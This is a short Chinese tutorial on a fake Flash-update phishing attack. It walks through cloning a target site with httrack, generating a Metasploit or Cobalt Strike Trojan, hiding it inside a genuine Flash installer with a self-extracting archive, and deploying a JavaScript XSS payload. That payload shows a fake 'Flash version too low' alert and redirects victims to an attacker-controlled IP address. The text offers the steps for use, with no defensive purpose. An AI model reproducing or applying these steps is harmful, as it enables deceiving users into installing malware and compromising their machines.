水一篇☔️

  1. 安装完整页面爬取工具

    1
    2
    3
    # kali
    apt-get install httrack
    # yum install httrack –y
  2. 运行httrack,爬取需要爬取的页面,按提示填写

  3. 去比对官网页面修改不一样的地方,使首页和目标一样

  4. 下载flash正常exe,生成相应木马如msf/cs等

  5. 制作合成木马

    1. 将两个木马放在同一个目录下
    2. 填写以exe结尾的文件名image.png
    3. 点高级,进入自解压,填写解压绝对路径image.png
    4. 填写解压后的两个文件名image.png
    5. 选择全部隐藏image.png
    6. image.png

      flash结合xss

      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      window.alert = function(name){
      var iframe = document.createElement("IFRAME");
      iframe.style.display="none";
      iframe.setAttribute("src",'data:text/plain,');
      document.documentElement.appendChild(iframe);
      window.frames[0].window.alert(name);
      iframe.parentNode.removeChild(iframe);
      }
      alert("您的FLASH版本过低,尝试升级后访问该页面! ");
      window.location.href="http://192.168.0.110";